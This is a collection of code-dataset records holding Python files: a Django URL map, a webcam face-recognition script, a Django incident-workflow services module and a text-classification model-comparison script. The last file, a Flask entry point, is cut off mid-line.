'medi.views.home'),\n url(r'^home$', 'medi.views.home'),\n url(r'^about$', 'medi.views.about'),\n url(r'^login$', 'medi.views.login_view'),\n url(r'^register$', 'medi.views.sign_up'),\n url(r'^logout$', 'medi.views.logout_view'),\n\n #url(r'^upload/$', 'video_converter.views.upload'),\n #url(r'^s3direct/', include('s3direct.urls')),\n \n #api urls\n #url(r'^api/convert/$', 'video_converter.views.convert'),\n #url(r'^api/progress/$', 'video_converter.views.progress'),\n #url(r'^api/get_url/$', 'video_converter.views.get_url'),\n)\n","sub_path":"medi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119078005","text":"\"\"\"Performs face alignment and stores face thumbnails in the output directory.\n\"\"\"\nimport argparse\nimport sys\n\nimport cv2\nimport dlib\nimport tensorflow as tf\nfrom scipy import misc\nfrom sklearn.externals import joblib\n\nfrom decorators import timer_format\nimport facenet\n\n\nCONST_DIST = 1.2\nFRAME_INTERVAL = 3\nN_CHANNELS = 3\n\n\ndef css_to_bounds(css, image_shape):\n return max(css[0], 0), min(css[1], image_shape[1]), \\\n min(css[2], image_shape[0]), max(css[3], 0)\n\n\n@timer_format()\ndef main(args):\n print('Creating networks and loading parameters')\n\n with tf.Graph().as_default():\n gpu_options = tf.GPUOptions(\n per_process_gpu_memory_fraction=args.gpu_memory_fraction\n )\n sess = tf.Session(config=tf.ConfigProto(\n gpu_options=gpu_options, log_device_placement=False)\n )\n with 
sess.as_default():\n facenet.load_model(args.model_trained)\n\n # Get input and output tensors\n images_placeholder = \\\n tf.get_default_graph().get_tensor_by_name(\"input:0\")\n embeddings = \\\n tf.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n phase_train_placeholder = \\\n tf.get_default_graph().get_tensor_by_name(\"phase_train:0\")\n # (None, 128)\n\n labels, class_names, embed_arrays = joblib.load(\n args.model_filename\n )\n # Classify images\n model = joblib.load(args.classifier_filename)\n\n detector = dlib.get_frontal_face_detector()\n # https://gist.github.com/ageitgey/ae340db3e493530d5e1f9c15292e5c74\n # face_pose_predictor = dlib.shape_predictor(args.predictor_path)\n # sp = dlib.shape_predictor(args.predictor_path)\n\n # Get a reference to webcam #0 (the default one)\n video_capture = cv2.VideoCapture(0)\n c = 0\n while True:\n ret, frame = video_capture.read()\n\n if c % FRAME_INTERVAL == 0:\n img = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n if img.ndim == 2:\n img = facenet.to_rgb(img)\n img = img[:, :, 0:3]\n\n detected_faces = detector(img, 0)\n if len(detected_faces) == 0:\n print(\"No faces found\")\n # cv2.imshow('Video', frame)\n # continue\n else:\n for i, face_rect in enumerate(detected_faces, start=1):\n left, top, right, bottom = \\\n int(face_rect.left()) * 4, int(face_rect.top()) * 4, \\\n int(face_rect.right()) * 4, int(face_rect.bottom()) * 4\n\n img_croped = misc.imresize(\n frame[top:bottom, left:right, :],\n (args.image_size, args.image_size),\n interp='bilinear'\n )\n face_image_4d = facenet.load_test_web_data(\n img_croped,\n False, False, args.image_size\n )\n feed_dict = {\n images_placeholder: face_image_4d, # ndarray\n phase_train_placeholder: False\n }\n emb_array = sess.run(\n embeddings, feed_dict=feed_dict\n )\n\n # Draw a box around the face\n cv2.rectangle(\n frame,\n (left, top),\n (right, bottom),\n (0, 0, 255), 2\n )\n\n # Draw a label with a name below the face\n cv2.rectangle(\n frame,\n (left, bottom - 35),\n (right, bottom),\n (0, 0, 255), cv2.FILLED\n )\n\n # print(\"\\t>>> Embed shape: \", emb_array.shape)\n distances, indexes = model.kneighbors(\n emb_array.reshape(1, -1), return_distance=True\n )\n\n # PREDICTION\n predictions = model.predict(emb_array)\n print(\"\\t>>> Index (non threshold): \",\n class_names[predictions[0]]\n )\n print(\"\\t>>> Predictions (nonthreshold): \", predictions[0])\n\n # https://github.com/ageitgey/face_recognition/blob/master/examples/face_recognition_knn.py\n checked = any(d < CONST_DIST for d in distances[0])\n print(\"\\t>>> Distance: \", distances[0])\n font = cv2.FONT_HERSHEY_DUPLEX\n if checked:\n cv2.putText(\n frame,\n \"{} \".format(i) + class_names[predictions[0]],\n (left + 6, bottom - 6), font,\n 1.0, (255, 255, 255), 1\n )\n print(\"\\t>>> Label: %s\" % class_names[predictions[0]])\n else:\n cv2.putText(\n frame, \"{} \".format(i) + \"---\",\n (left + 6, bottom - 6), font,\n 1.0, (255, 255, 255), 1\n )\n print(\"\\t>>> Label: %s\" % \"Unknown\")\n del face_image_4d, emb_array, detected_faces\n\n cv2.imshow('Video', frame)\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n c += 1\n\n video_capture.release()\n cv2.destroyAllWindows()\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--model_trained', type=str,\n help='Link to model trained'\n )\n parser.add_argument(\n '--classifier_filename', type=str,\n help='Link to classifier filename trained'\n )\n parser.add_argument(\n 
'--model_filename', type=str,\n help='Link to model filename trained'\n )\n parser.add_argument(\n '--predictor_path', type=str,\n help='Link to dlib model'\n )\n parser.add_argument(\n '--image_size', type=int,\n help='Image size (height, width) in pixels.', default=160\n )\n parser.add_argument(\n '--margin', type=int,\n help='Margin for the crop around the bounding box (height, width) in pixels.', default=32 # noqa\n )\n parser.add_argument(\n '--random_order',\n help='Shuffles the order of images to enable alignment using multiple processes.', action='store_true' # noqa\n )\n parser.add_argument(\n '--gpu_memory_fraction', type=float,\n help='Upper bound on the amount of GPU memory that will be used by the process.', default=0.25 # noqa\n )\n return parser.parse_args(argv)\n\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))\n","sub_path":"src/realtime_detection_dlib.py","file_name":"realtime_detection_dlib.py","file_ext":"py","file_size_in_byte":6985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525176511","text":"from .models import (\n Incident,\n IncidentStatus,\n IncidentSeverity,\n StatusType,\n SeverityType,\n Reporter,\n IncidentComment,\n)\nfrom django.contrib.auth.models import User, Group\n\nfrom ..events import services as event_services\nfrom ..events.models import Event\nfrom django.db import connection\n\nfrom .exceptions import WorkflowException, IncidentException\n\n\ndef is_valid_incident(incident_id: str) -> bool:\n try:\n incident = Incident.objects.get(id=incident_id)\n return True\n except Exception as e:\n return False\n\n\ndef get_incident_by_id(incident_id: str) -> Incident:\n try:\n incident = Incident.objects.get(id=incident_id)\n if incident is None:\n raise IncidentException(\"Invalid incident id\")\n except:\n raise IncidentException(\"Invalid incident id\")\n\n return incident\n\n\ndef get_user_by_id(user_id: str) -> User:\n try:\n user = User.objects.get(id=user_id)\n if user is None:\n raise IncidentException(\"Invalid user id\")\n except:\n raise IncidentException(\"Invalid user id\")\n\n return user\n\n\ndef get_reporter_by_id(reporter_id: str) -> Incident:\n try:\n return Reporter.objects.get(id=reporter_id)\n except Exception as e:\n return None\n\n\ndef get_comments_by_incident(incident: Incident) -> IncidentComment:\n try:\n return IncidentComment.objects.get(incident=incident)\n except Exception as e:\n return None\n\n\ndef create_incident_postscript(incident: Incident, user: User) -> None:\n \"\"\"Function to take care of event, status and severity creation\"\"\"\n status = IncidentStatus(current_status=StatusType.NEW,\n incident=incident, approved=True)\n status.save()\n\n severity = IncidentSeverity(\n current_severity=SeverityType.DEFAULT, incident=incident, approved=True\n )\n severity.save()\n\n reporter = Reporter()\n reporter.save()\n\n incident.reporter = reporter\n incident.assignee = user\n incident.save()\n\n event_services.create_incident_event(user, incident)\n\n\ndef update_incident_postscript(incident: Incident, user: User) -> None:\n event_services.create_comment_event(user, incident)\n\n\ndef update_incident_status(\n incident: Incident, user: User, status_type_str: str\n) -> None:\n\n if incident.hasPendingStatusChange == \"T\":\n return (\"error\", \"Incident status is locked for pending changes\")\n\n try:\n # check for valid status type\n status_type = StatusType[status_type_str]\n except:\n return (\"error\", \"Invalid status type\")\n\n if 
user.has_perm(\"incidents.can_request_status_change\"):\n # if user can't directly change the status\n # only a pending change is added\n status = IncidentStatus(\n current_status=status_type,\n previous_status=incident.current_status,\n incident=incident,\n approved=False,\n )\n status.save()\n incident.hasPendingStatusChange = \"T\"\n incident.save()\n event_services.update_incident_status_event(\n user, incident, status, False)\n\n elif user.has_perm(\"incidents.can_change_status\"):\n status = IncidentStatus(\n current_status=status_type,\n previous_status=incident.current_status,\n incident=incident,\n approved=True,\n )\n status.save()\n incident.hasPendingStatusChange = \"F\"\n incident.save()\n event_services.update_incident_status_event(\n user, incident, status, True)\n\n return (\"success\", \"Status updated\")\n\n\ndef update_incident_severity(\n incident: Incident, user: User, severity_type_str: str\n) -> None:\n\n if incident.hasPendingSeverityChange == \"T\":\n return (\"error\", \"Incident severity is locked for pending changes\")\n\n try:\n # check for valid severity type\n severity_type = SeverityType[severity_type_str]\n except:\n return (\"error\", \"Invalid severity type\")\n\n if user.has_perm(\"incidents.can_request_severity_change\"):\n severity = IncidentSeverity(\n current_severity=severity_type,\n previous_severity=incident.current_severity,\n incident=incident,\n approved=False,\n )\n severity.save()\n incident.hasPendingSeverityChange = \"T\"\n incident.save()\n event_services.update_incident_severity_event(\n user, incident, severity, False)\n\n elif user.has_perm(\"incidents.can_change_severity\"):\n severity = IncidentSeverity(\n current_severity=severity_type,\n previous_severity=incident.current_severity,\n incident=incident,\n approved=True,\n )\n severity.save()\n incident.hasPendingSeverityChange = \"F\"\n incident.save()\n event_services.update_incident_severity_event(\n user, incident, severity, True)\n\n return (\"success\", \"Severity updated\")\n\n\ndef create_incident_comment_postscript(\n incident: Incident, user: User, comment: IncidentComment\n) -> None:\n \"\"\"Function to take care of event, status and severity creation\"\"\"\n\n if comment.is_outcome:\n event_services.create_outcome_event(user, incident, comment)\n else:\n event_services.create_comment_event(user, incident, comment)\n\n\ndef get_incidents_by_status(status_type_str: str) -> Incident:\n try:\n incidents = Incident.objects.all()\n filtered_incidents = (\n incident for incident in incidents if incident.current_status == status_type_str)\n return filtered_incidents\n except Exception as e:\n return None\n\n\ndef get_incidents_before_date(date: str) -> Incident:\n try:\n return Incident.objects.all().filter(created_date__lte=date)\n except Exception as e:\n return None\n\n\ndef incident_auto_assign(incident: Incident, user_group: Group):\n \"\"\"auto assign will find the user from the given user group with minimum\n # of incidents already assigned\n \"\"\"\n\n # should we move this to a view / procedure lateron?\n # also query optimizations here are welcome\n sql = \"\"\"\n SELECT usr.id, COUNT(incident.id) as incident_count FROM `auth_user` as usr \n LEFT JOIN incidents_incident as incident on incident.assignee_id = usr.id \n INNER JOIN auth_user_groups on usr.id = auth_user_groups.user_id\n INNER JOIN auth_group as grp on grp.id = auth_user_groups.group_id\n WHERE grp.rank = %d\n GROUP BY usr.id\n ORDER BY incident_count ASC\n \"\"\" % user_group.rank\n\n with 
connection.cursor() as cursor:\n cursor.execute(sql)\n row = cursor.fetchone()\n\n if row is None:\n return (\"error\", \"Error in finding auto assignment\")\n\n assignee = User.objects.get(id=row[0])\n incident.assignee = assignee\n incident.save()\n\n return (\"success\", \"Auto assign completed\", assignee)\n\n\ndef incident_escalate(user: User, incident: Incident, escalate_dir: str = \"UP\"):\n # find the rank of the current incident assignee\n assignee_groups = incident.assignee.groups.all()\n if len(assignee_groups) == 0:\n raise WorkflowException(\"No group for current assignee\")\n\n current_rank = assignee_groups[0].rank\n\n # if escalate UP\n next_rank = current_rank - 1\n if escalate_dir == \"DOWN\":\n next_rank = current_rank + 1\n\n next_group = Group.objects.get(rank=next_rank)\n if next_group is None:\n raise WorkflowException(\"Can't escalate %s from here\" % escalate_dir)\n\n result = incident_auto_assign(incident, next_group)\n event_services.create_assignment_event(user, incident, result[2])\n\n\ndef incident_change_assignee(user: User, incident: Incident, assignee: User):\n incident.assignee = assignee\n incident.save()\n\n event_services.create_assignment_event(user, incident, assignee)\n\n\ndef incident_close(user: User, incident: Incident, comment: str):\n # find number of outcomes for the incident\n outcomes = IncidentComment.objects.filter(\n incident=incident, is_outcome=True).count()\n\n if incident.hasPendingStatusChange == \"T\":\n raise WorkflowException(\"Incident has pending changes, can not close\")\n\n if incident.current_status == StatusType.ACTION_PENDING:\n raise WorkflowException(\n \"All pending actions needs to be resolved first\")\n\n if outcomes == 0:\n raise WorkflowException(\n \"Incident need at least 1 outcome before closing\")\n\n status = IncidentStatus(\n current_status=StatusType.CLOSED,\n previous_status=incident.current_status,\n incident=incident\n )\n\n if user.has_perm(\"incidents.can_request_status_change\"):\n # if user can't directly change the status\n # only a pending change is added\n status.approved = False\n status.save()\n\n incident.hasPendingStatusChange = \"T\"\n incident.save()\n\n event_services.update_status_with_description_event(\n user, incident, status, False, comment)\n\n elif user.has_perm(\"incidents.can_change_status\"):\n status.approved = True\n status.save()\n\n incident.hasPendingStatusChange = \"F\"\n incident.save()\n\n event_services.update_status_with_description_event(\n user, incident, status, True, comment)\n\n\ndef incident_escalate_external_action(user: User, incident: Incident, comment: str):\n # new event\n status = IncidentStatus(\n current_status=StatusType.ACTION_PENDING,\n previous_status=incident.current_status,\n incident=incident,\n approved=True\n )\n status.save()\n\n event_services.start_action_event(user, incident, status, comment)\n\n\ndef incident_complete_external_action(user: User, incident: Incident, comment: str, start_event: Event):\n # new event\n status = IncidentStatus(\n current_status=StatusType.ACTION_PENDING,\n previous_status=incident.current_status,\n incident=incident,\n approved=True\n )\n status.save()\n\n event_services.complete_action_event(\n user, incident, status, comment, start_event)\n\n\ndef incident_request_advice(user: User, incident: Incident, assignee: User, comment: str):\n status = IncidentStatus(\n current_status=StatusType.ADVICE_REQESTED,\n previous_status=incident.current_status,\n incident=incident,\n approved=True\n )\n status.save()\n\n 
incident.linked_individuals.append(assignee)\n incident.save()\n\n event_services.update_status_with_description_event(user, incident, status, True, comment)\n\n\ndef incident_provide_advice(user: User, incident: Incident, advice: str):\n if user not in incident.linked_individuals:\n raise WorkflowException(\"User not linked to the given incident\")\n\n if incident.current_status != StatusType.ADVICE_REQESTED:\n raise WorkflowException(\"Incident does not have pending advice requests\")\n\n status = IncidentStatus(\n current_status=StatusType.ADVICE_PROVIDED,\n previous_status=incident.current_status,\n incident=incident,\n approved=True\n )\n status.save()\n\n # check this\n incident.linked_individuals.remove(user.id)\n\n event_services.update_status_with_description_event(user, incident, status, True, advice)\n\ndef incident_verify(user: User, incident: Incident, comment: str):\n if incident.current_status != StatusType.NEW.name:\n raise WorkflowException(\"Can only verify unverified incidents\")\n\n status = IncidentStatus(\n current_status=StatusType.VERIFIED,\n previous_status=incident.current_status,\n incident=incident,\n approved=True\n )\n status.save()\n\n event_services.update_status_with_description_event(user, incident, status, True, comment)\n","sub_path":"backend/src/incidents/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":11823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136871919","text":"import argparse\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer as CV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, label_binarize\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.metrics import roc_curve, auc, confusion_matrix, accuracy_score, precision_score, recall_score, f1_score\nimport tensorflow as tf\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout, MaxPooling1D, Conv1D, LSTM, Embedding\nfrom keras import utils\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing import text\nfrom scipy import interp\nimport pandas as pd\nimport sys\n\n\ndef bagofwords_conversion(corpus, grams=1):\n m = CV(ngram_range=(1, grams), min_df=1)\n m.fit(corpus)\n return m\n\n\ndef load_round1_data(fp):\n corpus = []\n labels = []\n if sys.version_info >= (3, 0):\n f = open(fp, encoding=\"utf-8\")\n else:\n f = open(fp)\n for line in f:\n line = [i.strip().lower() for i in line.split('\\t')]\n assert len(line) == 2, ValueError(\"Format of input file {} is wrong at line {}\".format(fp, line))\n labels.append(line[1])\n corpus.append(line[0])\n return corpus, labels\n\n\ndef diagnostic_samples(preds, xtest, labels, labeldecoder, worddecoder):\n labels = labeldecoder.inverse_transform(labels)\n samples = worddecoder.inverse_transform(xtest)\n preds2 = labeldecoder.inverse_transform(preds)\n cnt = 0\n for q, l1, l2 in zip(samples, preds2, labels):\n if l1 != l2:\n print(\"Question: {}, Prediction:{}, Label: {}\".format(q, l1, l2))\n cnt += 1\n if cnt > 10:\n return\n\n\ndef calculate_aucs(y_test, y_score, name, plot=False):\n # 
Compute ROC curve and ROC area for each class\n y_test = y_test.squeeze()\n y_score = y_score.squeeze()\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n classes = sorted(set(y_test))\n n_classes = len(classes)\n y_test = label_binarize(y_test, classes)\n y_score = label_binarize(y_score, classes)\n for i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n # Compute macro-average ROC curve and ROC area\n\n # First aggregate all false positive rates\n all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))\n\n # Then interpolate all ROC curves at this points\n mean_tpr = np.zeros_like(all_fpr)\n for i in range(n_classes):\n mean_tpr += interp(all_fpr, fpr[i], tpr[i])\n\n # Finally average it and compute AUC\n mean_tpr /= n_classes\n\n fpr[\"macro\"] = all_fpr\n tpr[\"macro\"] = mean_tpr\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\n\n # Compute macro-average ROC curve and ROC area\n\n # First aggregate all false positive rates\n all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))\n\n # Then interpolate all ROC curves at this points\n mean_tpr = np.zeros_like(all_fpr)\n for i in range(n_classes):\n mean_tpr += interp(all_fpr, fpr[i], tpr[i])\n\n # Finally average it and compute AUC\n mean_tpr /= n_classes\n\n fpr[\"macro\"] = all_fpr\n tpr[\"macro\"] = mean_tpr\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\n return roc_auc\n\n\ndef calculate_metrics(true, pred, name):\n names.append(name)\n acc = accuracy_score(pred, true)\n accs.append(acc)\n pre = precision_score(pred, true, average=\"micro\")\n pre2 = precision_score(pred, true, average=\"macro\")\n rec = recall_score(pred, true, average=\"micro\")\n rec2 = recall_score(pred, true, average=\"macro\")\n recs.append(rec)\n recs2.append(rec2)\n pres.append(pre)\n pres2.append(pre2)\n f1 = f1_score(pred, true, average=\"micro\")\n f12 = f1_score(pred, true, average=\"macro\")\n f1s.append(f1)\n f1s2.append(f12)\n aucs = calculate_aucs(true, pred, name, False)\n maaucs.append(aucs[\"macro\"])\n miaucs.append(aucs[\"micro\"])\n conf = confusion_matrix(true, pred)\n confs.append(conf)\n\n\ndef sklearn_routine(lr_model, name):\n lr_model.fit(Xtrain, Ytrain)\n print(\"----{}: Training Accuracy----\".format(name))\n acc1 = lr_model.score(Xtrain, Ytrain)\n print(\"{:.3f}\".format(acc1))\n print(\"----{}: Testing Accuracy----\".format(name))\n preds = lr_model.predict(Xtest)\n acc2 = lr_model.score(Xtest, Ytest)\n print(\"{:.3f}\".format(acc2))\n calculate_metrics(Ytest, preds, name)\n if args.mode != \"tf\":\n diagnostic_samples(preds, Xtest, Ytest, labelEncoder, bagOfWords)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Perform some initial testing for question intention model training\")\n parser.add_argument(\"--data\", default=\"./training_data.csv\", help=\"Path of training data in csv (headerless)\\\n format\")\n parser.add_argument(\"--model\", default=\"./models\", help=\"Directory to output of models\")\n parser.add_argument(\"--grams\", default=1, type=int, help=\"Number of n-grams\")\n parser.add_argument(\"--batch\", default=500, type=int, help=\"minibatch batch size\")\n parser.add_argument(\"--epoch\", default=20, type=int, help=\"Number of epochs\")\n parser.add_argument(\"--debug\", 
default=False, action=\"store_true\", help=\"Output debugging info\")\n parser.add_argument(\"--mode\", default=\"lr\", help=\"\"\"Mode of action:\n lr -- logistic regression models and a basic naive bayes.\n mc -- collection of multiclass classifiers from sklearn.\n tf -- tensorflow linear classifiers + keras vectorizer\n rnn -- CNN + vRNN\n \"\"\")\n args = parser.parse_args()\n if args.mode not in [\"lr\", \"mc\", \"tf\"]:\n raise NotImplementedError(\"Mode {} is not supported\".format(args.mode))\n else:\n corpus, raw_labels = load_round1_data(args.data)\n bagOfWords = bagofwords_conversion(corpus, args.grams)\n vectorizedData = bagOfWords.transform(corpus)\n labelEncoder = LabelEncoder()\n intLabels = labelEncoder.fit_transform(raw_labels)\n intLabels = intLabels.reshape(-1, 1)\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(vectorizedData, intLabels, test_size=0.2)\n num_classes = len(set(list(Ytrain.squeeze())))\n df = pd.DataFrame()\n class_labels = labelEncoder.inverse_transform([i for i in range(num_classes)])\n accs = pres = pres2 = recs = recs2 = f1s = f1s2 = maaucs = miaucs = names = confs = []\n\n if args.mode == \"lr\":\n for lr_model, name in zip([\n LogisticRegression(multi_class=\"multinomial\", solver=\"lbfgs\"),\n LogisticRegressionCV(multi_class=\"multinomial\", solver=\"lbfgs\"),\n MultinomialNB()\n ], [\n \"LogisticRegression\",\n \"LogisticRegression+CrossValidation\",\n \"Naive Bayes multinomial\"\n ]):\n sklearn_routine(lr_model, name)\n\n elif args.mode == \"mc\":\n\n classifiers = [\n KNeighborsClassifier(3),\n SVC(kernel=\"linear\", C=0.025),\n SVC(gamma=2, C=1),\n DecisionTreeClassifier(max_depth=5),\n RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),\n MLPClassifier(alpha=1),\n AdaBoostClassifier(),\n ]\n\n names_ = [\"Nearest Neighbors\", \"Linear SVM\", \"RBF SVM\",\n \"Decision Tree\", \"Random Forest\", \"Neural Net\", \"AdaBoost\"]\n\n for lr_model, name in zip(classifiers, names_):\n sklearn_routine(lr_model, name)\n\n elif args.mode == \"tf\":\n\n def mat_to_if(matrix, labels):\n return tf.estimator.inputs.numpy_input_fn(\n {\"x\": matrix},\n labels,\n batch_size=args.batch,\n num_epochs=args.epoch,\n shuffle=False\n )\n\n def mat_to_if_test(matrix):\n return tf.estimator.inputs.numpy_input_fn(\n {\"x\": matrix},\n shuffle=False\n )\n names = []\n tokenizer = text.Tokenizer(char_level=False)\n tokenizer.fit_on_texts(corpus)\n vectorizedData = tokenizer.texts_to_matrix(corpus, mode=\"freq\")\n # consider only doing this for train\n labelEncoder = LabelEncoder()\n intLabels = labelEncoder.fit_transform(raw_labels)\n intLabels = intLabels.reshape(-1, 1)\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(vectorizedData, intLabels, test_size=0.2)\n Ytrain2 = utils.to_categorical(Ytrain, num_classes)\n Ytest2 = utils.to_categorical(Ytest, num_classes)\n\n # Model 0, linear estimator (logistic regression)\n if args.debug:\n tf.logging.set_verbosity(tf.logging.INFO)\n\n def train_lc():\n with tf.Session():\n model = tf.estimator.LinearClassifier(\n [tf.feature_column.numeric_column(\"x\", Xtrain.shape[1])],\n n_classes=num_classes,\n model_dir=\"{}/lcestimator\".format(args.model)\n )\n history = model.train(input_fn=mat_to_if(Xtrain, Ytrain))\n score = model.evaluate(input_fn=mat_to_if(Xtest, Ytest))\n print(\"train score\", history)\n print('Test score:', score)\n preds = [r for r in model.predict(mat_to_if_test(Xtest))]\n preds = [r[\"class_ids\"] for r in preds]\n preds = np.array(preds).astype(np.int64).squeeze()\n name = 
\"LinearClassifier,default\"\n calculate_metrics(preds, Ytest, name)\n\n def train_lc2():\n with tf.Session():\n model = tf.estimator.LinearClassifier(\n [tf.feature_column.numeric_column(\"x\", Xtrain.shape[1])],\n n_classes=num_classes,\n model_dir=\"{}/lcestimator2\".format(args.model),\n optimizer=lambda: tf.train.FtrlOptimizer(\n learning_rate=tf.train.exponential_decay(\n learning_rate=0.1,\n global_step=tf.train.get_global_step(),\n decay_steps=10000,\n decay_rate=0.96)\n )\n )\n history = model.train(input_fn=mat_to_if(Xtrain, Ytrain))\n score = model.evaluate(input_fn=mat_to_if(Xtest, Ytest))\n print(\"train score\", history)\n print('Test score:', score)\n preds = [r for r in model.predict(mat_to_if_test(Xtest))]\n preds = [r[\"class_ids\"] for r in preds]\n preds = np.array(preds).astype(np.int64).squeeze()\n name = \"LinearClassifier,FtrlWeightDecay\"\n calculate_metrics(preds, Ytest, name)\n\n # Model 1, NN equivalent of LR\n def train_lr_nn():\n with tf.Session():\n model = Sequential()\n model.add(Dense(num_classes, input_shape=(Xtest.shape[1],)))\n model.add(Activation('softmax'))\n model.compile(optimizer='sgd', loss='categorical_crossentropy', metrics=['accuracy'])\n history = model.fit(Xtrain, Ytrain2,\n batch_size=args.batch,\n epochs=args.epoch,\n verbose=1,\n validation_split=0.1)\n model.save(\"{}/lrnn.h5\".format(args.model))\n score = model.evaluate(Xtest, Ytest2, verbose=1)\n print('Train score:', history)\n print('Test score:', score)\n preds = model.predict(Xtest)\n preds = np.argmax(preds, axis=1).squeeze()\n name = \"LogisticRegressionAsNN\"\n calculate_metrics(preds, Ytest, name)\n\n # Model 2, NN with dropout\n def train_nn():\n with tf.Session():\n model = Sequential()\n model.add(Dense(512, input_shape=(Xtest.shape[1],)))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n history = model.fit(Xtrain, Ytrain2,\n batch_size=args.batch,\n epochs=args.epoch,\n verbose=1,\n validation_split=0.1)\n\n # Evaluate the accuracy of our trained model\n score = model.evaluate(Xtest, Ytest2, verbose=1)\n model.save(\"{}/nn.h5\".format(args.model))\n print('Train score:', history)\n print('Test score:', score)\n preds = model.predict(Xtest)\n preds = np.argmax(preds, axis=1).squeeze()\n name = \"NNwithDropout,1hidden\"\n calculate_metrics(preds, Ytest, name)\n\n def train_nn2():\n with tf.Session():\n model = Sequential()\n model.add(Dense(512, input_shape=(Xtest.shape[1],)))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(128))\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n history = model.fit(Xtrain, Ytrain2,\n batch_size=args.batch,\n epochs=args.epoch,\n verbose=1,\n validation_split=0.1)\n\n # Evaluate the accuracy of our trained model\n score = model.evaluate(Xtest, Ytest2, verbose=1)\n model.save(\"{}/nn2.h5\".format(args.model))\n print('Train score:', history)\n print('Test score:', score)\n preds = model.predict(Xtest)\n preds = np.argmax(preds, axis=1).squeeze()\n name = \"NNwithDropout,2hidden\"\n calculate_metrics(preds, Ytest, name)\n\n def train_lstm_cnn():\n with tf.Session():\n seqs = tokenizer.texts_to_sequences(corpus)\n maxlen = max(map(len, seqs))\n print(\"maxlen is {}\".format(maxlen))\n seqs = pad_sequences(seqs, maxlen=maxlen)\n Xtrain, 
Xtest, Ytrain, Ytest = train_test_split(seqs, intLabels, test_size=0.2)\n Ytrain2 = utils.to_categorical(Ytrain, num_classes)\n Ytest2 = utils.to_categorical(Ytest, num_classes)\n model = Sequential()\n model.add(Embedding(2000, 128, input_length=maxlen))\n model.add(Dropout(0.25))\n model.add(Conv1D(64, 5,\n padding='valid',\n activation='relu',\n strides=1))\n model.add(MaxPooling1D(pool_size=4))\n model.add(LSTM(70))\n model.add(Dense(num_classes))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n history = model.fit(Xtrain, Ytrain2,\n batch_size=int(args.batch/10),\n epochs=args.epoch,\n verbose=1,\n validation_split=0.1)\n\n # Evaluate the accuracy of our trained model\n score = model.evaluate(Xtest, Ytest2, verbose=1)\n model.save(\"{}/lstmcnn.h5\".format(args.model))\n print('Train score:', history)\n print('Test score:', score)\n preds = model.predict(Xtest)\n preds = np.argmax(preds, axis=1).squeeze()\n name = \"NNwithDropout,lstmcnn\"\n calculate_metrics(preds, Ytest, name)\n\n def train_lstm_rnn():\n pass\n train_lc()\n train_lc2()\n train_nn2()\n train_nn()\n train_lr_nn()\n else:\n raise NotImplementedError(\"Mode {} is not supported\".format(args.mode))\n df[\"Model\"] = names\n df[\"Testing Accuracy\"] = accs\n df[\"Testing Precision, micro-average\"] = pres\n df[\"Testing Precision, macro-average\"] = pres2\n df[\"Testing Recall, micro-average\"] = recs\n df[\"Testing Recall, macro-average\"] = recs2\n df[\"Testing F1, micro-average\"] = f1s\n df[\"Testing F1, macro-average\"] = f1s2\n df[\"micro-average ROC AUC\"] = miaucs\n df[\"macro-average ROC AUC\"] = maaucs\n df[\"labels\"] = [class_labels for i in names]\n df[\"confusion_matrix\"] = confs\n df.to_csv(\"{}/{}.metrics.csv\".format(args.model, args.mode), sep=\"\\t\", header=True, index=False)\n","sub_path":"test_models_r1.py","file_name":"test_models_r1.py","file_ext":"py","file_size_in_byte":17846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401559273","text":"__author__ = 'farzin'\n\nimport os\n\nfrom app.models import User\nfrom app import create_app, db\n\n\nif __name__ == '__main__':\n app = create_app(os.environ.get('FLASK_CONFIG', 